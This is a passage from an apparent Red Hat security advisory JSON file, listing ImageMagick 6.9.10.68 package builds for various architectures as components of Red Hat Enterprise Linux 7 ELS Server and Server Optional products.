"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server (v. 7 ELS)",
"product_id": "7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.src",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.i686 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
